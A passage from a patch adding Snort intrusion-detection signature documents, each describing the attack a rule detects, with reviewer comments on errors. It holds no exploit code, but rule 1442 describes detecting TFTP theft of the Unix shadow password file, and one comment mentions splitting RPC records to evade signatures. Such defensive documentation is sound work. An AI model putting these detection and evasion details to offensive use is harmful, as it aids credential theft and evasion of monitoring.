+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_master_repgroup
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
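Review bot: the sentence "vulnerability in the procedure create_master_repgroup" is followed by a line that begins ". This procedure is included in", leaving the period at the start of a line; rejoin it into one sentence. "Oracle Oracle9i" in Affected Systems duplicates the vendor name. Ease of Attack "Simple." should state whether the attacker needs an authenticated database session with execute rights on sys.dbms_repcat_mas to reach the procedure, because that prerequisite changes both the rating and how the alert is triaged. Additional References is empty; add the Oracle alert or CVE for this overflow.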
--- /dev/null
+++ b/doc/signatures/2955.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2955
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
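Review bot: False Positives "None known." is hard to reconcile with Detailed Information, which says the rule fires on access to "private or administrative shares"; legitimate administrators connect to those shares routinely, so name the share(s) the rule matches and note that administrative activity from management hosts will trigger it. Typo "adminsitrative" in Attack Scenarios. Apart from the Sid and contributors this text is identical to 2972.txt earlier in the patch; state how the two rules differ.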
--- /dev/null
+++ b/doc/signatures/3276.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3276
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
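Review bot: this document is word-for-word the same as 3290.txt later in the patch, so nothing tells the reader what distinguishes Sid 3276 from Sid 3290; add to Detailed Information what traffic this rule matches that the other does not. Typo "Expoit code exists." in Ease of Attack. Additional References is empty for a vulnerability that has a Microsoft security bulletin. Corrective Action could note that blocking 135/139/445 at the perimeter does not protect against hosts already inside the segment, so patching is the primary fix.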
--- /dev/null
+++ b/doc/signatures/1802.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1802
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
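Review bot: Impact claims "Denial of Service is possible" but Detailed Information gives no basis for it and, like the Summary, never says which IIS vulnerability or URI pattern this rule matches; "the attack scenarios are legion" leaves the analyst nothing to triage on. Name the request the rule detects and add a reference in the empty Additional References section.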
--- /dev/null
+++ b/doc/signatures/1790.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1790
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
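Review bot: the Affected Systems section present in every other file is missing here, and "Sid: 1790" is on one line where the rest of the patch puts the number on its own line; keep the layout consistent for whatever tooling parses these files. Typo "unkown" in Impact. Summary "activity relating to network chat clients" does not say which protocol or command triggers the rule even though the only reference is the IRC protocol; state it.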
--- /dev/null
+++ b/doc/signatures/100000441.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000441
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Wikiwig" application running on a webserver. Access to the file "wk_lang.php" using a remote file being passed as the "WK[wkpath]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "WK[wkpath]" parameter in the "wk_lang.php" script used by the "Wikiwig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Wikiwig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2246.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2246
+
+--
+Summary:
+This event is generated when an attempt is made to access Webadmin from 
+a source external to the protected network.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+WebAdmin is a web application that allows remote administration of 
+MDaemon and RelayFax. A vulnerability exists such that the URI used by 
+WebAdmin discloses the installation location of MDaemon and RelayFax. A 
+URI can also be crafted by an attacker that would allow the reading of 
+any file on the system. This information might then be used in further 
+attacks against the host.
+
+--
+Affected Systems:
+	WebAdmin prior to 2.0.3
+
+--
+Attack Scenarios:
+The attacker needs to login to the server as an administrator then use 
+WebAdmin.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq archive:
+http://www.securityfocus.com/archive/1/319735
+
+--
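Review bot: Attack Scenarios ("The attacker needs to login to the server as an administrator then use WebAdmin.") contradicts Detailed Information, which says a crafted URI "would allow the reading of any file on the system"; state clearly whether the file read requires an authenticated WebAdmin session, since that determines whether Impact should stay at "Information disclosure." Casing is inconsistent ("Webadmin" in Summary, "WebAdmin" elsewhere). Affected Systems gives "WebAdmin prior to 2.0.3", so Corrective Action can name 2.0.3 as the fixed version instead of the generic "latest non-affected version".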
--- /dev/null
+++ b/doc/signatures/1552.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1552
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
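Review bot: like 1307.txt and 1802.txt, this document never identifies the URI or request the rule matches; "a known vulnerability on a web server or a web application" and "the attack scenarios are legion" give the analyst nothing to triage on. Name the pattern the rule detects and add a reference in the empty Additional References section.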
--- /dev/null
+++ b/doc/signatures/106-2.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+106-2
+
+--
+Summary:
+This event is generated when the pre-processor spp_rpc_decode detects
+network traffic that may constitute an attack. Specifically multiple
+records in one packet were detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_rpc_decode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
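Review bot: Attack Scenarios is empty and Impact is "Unknown.", yet Ease of Attack is "Simple."; explain why multiple RPC records in one packet matter: splitting one RPC request across several records is a way to evade signature matching on the individual fragments, which is why spp_rpc_decode reassembles and flags it. Detailed Information only repeats the Summary. Typo "consititute" in Detailed Information. The two leading blank lines before "Rule:" differ from the other files.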
--- /dev/null
+++ b/doc/signatures/422.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+422
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Registration Reply datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Mobile Registration Reply were never implemented and have been replaced by UDP and TCP versions of the message.  ICMP Type 36 datagrams with an ICMP Code other than 0, should never be seen in normal network conditions.
+
+--
+
+Detailed Information:
+ICMP Mobile Registration Reply datagrams were developed before the approval of RFC3344 (IP Mobility Support for IPv4).  Therefore these types of ICMP datagrams should never be seen in normal networking conditions.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 36 datagrams with undefined ICMP Codes are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
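Review bot: Impact has grammar errors: "ICMP Mobile Registration Reply were never implemented" should be "Replies were never implemented", and the comma in "with an ICMP Code other than 0, should never be seen" is stray. Attack Scenarios "None known" sits next to Ease of Attack "Numerous tools and scripts can generate this type of ICMP datagram."; either describe the scenario (crafted-packet probing, for example) or make Ease of Attack match. The Affected Systems section present in the other files is missing, and Corrective Action lacks a closing period.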
--- /dev/null
+++ b/doc/signatures/3067.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+3067
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"examine" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+In the case of Ipswitch IMail, an overly long mailbox name supplied as a
+parameter to the examine command may be a trigger condition of a buffer
+overflow. A name of 259 bytes or more may cause this to occur.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+	Ipswitch IMail 8.1.3
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
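Review bot: grammar: "associated with the several commands" should be "with several commands", "An attacker can supplied" should be "can supply", and "Brian Caswell<bmc@sourcefire.com>" is missing a space. Detailed Information gives the IMail trigger precisely ("A name of 259 bytes or more") but no length for Mercury; if the rule's threshold is the same, say so, because that figure is what an analyst needs to decide whether a long but legitimate mailbox name caused the alert, and False Positives "None known." is doubtful without it. Additional References is empty for two versioned vendor bugs.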
--- /dev/null
+++ b/doc/signatures/3107.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3107
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
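Review bot: Affected Systems "Microsoft Windows Server 2000" is not a product name; use "Microsoft Windows 2000 Server". Detailed Information says the unchecked buffer "exists when processing the length of messages sent to the logging service" but not which transport or named pipe carries them, so the analyst cannot tell which traffic the rule inspects; add it. Additional References is empty although this issue has a Microsoft security bulletin. There is a stray blank line between "--" and "Corrective Action:".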
--- /dev/null
+++ b/doc/signatures/3290.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3290
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
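Review bot: this file is word-for-word identical to 3276.txt except for the Sid, so the reader cannot tell what traffic distinguishes the two rules; add to Detailed Information what this rule matches that 3276 does not. Typo "Expoit code exists." in Ease of Attack. Additional References is empty for a vulnerability with a Microsoft security bulletin.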
--- /dev/null
+++ b/doc/signatures/2794.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2794
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_mview_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
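Review bot: the sentence "vulnerability in the procedure refresh_mview_repgroup" is followed by a line that begins ". This procedure is included in", the same broken layout as in 2830.txt; rejoin it into one sentence. "Oracle Oracle9i" in Affected Systems duplicates the vendor name. Ease of Attack "Simple." should state whether an authenticated database session with execute rights on dbms_repcat is required to reach the procedure. Additional References is empty.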
--- /dev/null
+++ b/doc/signatures/1442.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1442
+
+--
+Summary:
+This event is generated when a TFTP GET request is made for the "shadow" file.  This could be an indication that a remote attacker has compromised a system on the network and is transfering sensitive files back to the attacking system.
+
+--
+Impact:
+The "shadow" file normally stores encrypted password hashes and users names for Unix based systems.  If this file is being transfered over the network using TFTP it is normally an indication of a system compromise.
+
+In some situations this rule may only indicate a generic TFTP scan attempt, as the attacker may be scanning a large range of IP addresses for TFTP improperly configured TFTP servers.
+
+--
+Detailed Information:
+This rule searches for the filename "shadow" in TFTP GET requests.  The "shadow" file is used by Unix based systems to store encrypted password hases and users names for the system.
+
+--
+Attack Scenarios:
+After a successful system compromise an attacker may setup a tftp service to transfer files back to the attacking system.  Under this scenario these source address will point to the attack network and the destination address will be an address defined in the HOME_NET.
+
+Attackers may also scan large subnets for TFTP servers and make numerous generic GET request for common system files. 
+
+--
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large subnets for improperly configured TFTP servers.
+
+--
+False Positives:
+This rule was created to catch TFTP GET requests for "shadow", if this file name is being used during a legitimate TFTP session this rule will generate a false positive.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Depending on the situation blocking the attacker at the upstream router or firewall will eliminate the problem.  However, if the TFTP server is incorrectly configured and is actually serving the "shadow" file, it should be configured to only serve specific files from a safe directory.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+--
+Additional References
+None
+
+--
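Review bot: typos: "transfering" (Summary and Impact), "hases" (Detailed Information), "for TFTP improperly configured TFTP servers" (Impact, duplicated "TFTP"), "these source address will point" (Attack Scenarios, should be "the source address"), and "Additional References" lacks the colon used in the other files. Impact and Detailed Information call the contents of "shadow" "encrypted password hashes"; they are password hashes, not encrypted data. The direction point in Attack Scenarios (source in the attacker's network, destination in HOME_NET) is useful and could be mirrored in False Positives: a GET for a file merely named "shadow" from a known provisioning host is the expected benign case.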
--- /dev/null
+++ b/doc/signatures/290.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 
+290
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow in Qualcomm qpopper. 
+
+--
+Impact: 
+Remote access.  This attack may permit the execution of arbitrary commands with the privileges of root on the vulernable server.
+
+--
+Detailed Information:
+A buffer overflow exploit exists in version 3.x of Qualcomm qpopper daemon, permitting the execution of arbitrary commands with the privileges of root.  The buffer overflow vulnerability is present because of improper bounds checking associated with vsprintf() and sprintf() calls in pop_msg.c.
+
+--
+Affected Systems:
+Qualcomm qpopper 3.0 b20
+Qualcomm qpopper 3.0
+
+--
+Attack Scenarios:
+An attacker may exploit the qpopper buffer overflow vulnerability, permitting the execution of arbitrary commands with the privileges of root on the vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to qpopper3.0b22
+
+--
+Contributors:
+Original rule writer unknown.
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0822
+
+Bugtraq
+http://www.securityfocus.com/bid/830
+
+--
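Review bot: Detailed Information says "version 3.x of Qualcomm qpopper daemon" is vulnerable while Affected Systems lists only "3.0 b20" and "3.0" and Corrective Action says upgrade to "qpopper3.0b22" (missing space); make the version statements agree, since "3.x" implies later releases that the fix line contradicts. "A buffer overflow exploit exists in" should read "A buffer overflow vulnerability exists in". Typo "vulernable" in Impact. The CVE link uses the retired CAN- prefix; the entry is now CVE-1999-0822.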
--- /dev/null
+++ b/doc/signatures/296.txt
@@ -0,0 +1,61 @@
+SID:
+296
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd 
+server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead 
+to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55, 
+	University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+Simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this 
+problem
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
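Review bot: the section layout differs from every other file in the patch ("SID:" before "Rule:", separators placed before the blank line rather than after, and "References:" instead of "Additional References:"); normalise it if anything parses these files. Impact has a comma splice ("as the root user, This can lead"). Affected Systems has a trailing comma after "Netscape Messaging Server 3.55,". References is empty; add the CVE or Bugtraq entry for the AUTHENTICATE overflow so the two affected versions can be checked.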
--- /dev/null
+++ b/doc/signatures/1175.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+Sid:
+1175
+
+--
+
+Summary:
+This event is generated when an attempt is made to access the
+wwwboard.pl web application on a web server.
+
+--
+Impact:
+Possible unauthorised remote administration of the webboard application.
+
+--
+Detailed Information:
+Some versions of WWWBoard, Matt Wright's CGI web application, have
+vulnerabities, including a default administration password for
+the web application, and a flaw in content checking for posts of followup
+messages that can allow an attacker to overwrite previous posts
+
+--
+Affected Systems:
+ Matt Wrights WWWBoard
+
+--
+Attack Scenarios:
+An attacker can gain control of the application by using the default
+username and password for the script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Normal, non-malicious accesses to wwwboard will generate events.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Do not use WWWBoard.
+
+Reconfigure the script to use a different administrator password.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
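Review bot: Detailed Information has "vulnerabities" for "vulnerabilities" and ends without a period, Affected Systems is missing the apostrophe in "Matt Wright's WWWBoard", and Contributors has "unkown" for "unknown". The False Positives entry is the important one here: because the rule fires on any request for wwwboard.pl, ordinary board traffic alerts, so the Summary should say plainly that this is an access-to-script event rather than an exploit detection, and Impact ("Possible unauthorised remote administration") should be read in that light. The References section is empty; the default administration password and the follow-up overwrite flaw described in Detailed Information should be cited so an analyst can confirm which WWWBoard versions are actually affected.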
--- /dev/null
+++ b/doc/signatures/2933.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2933
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
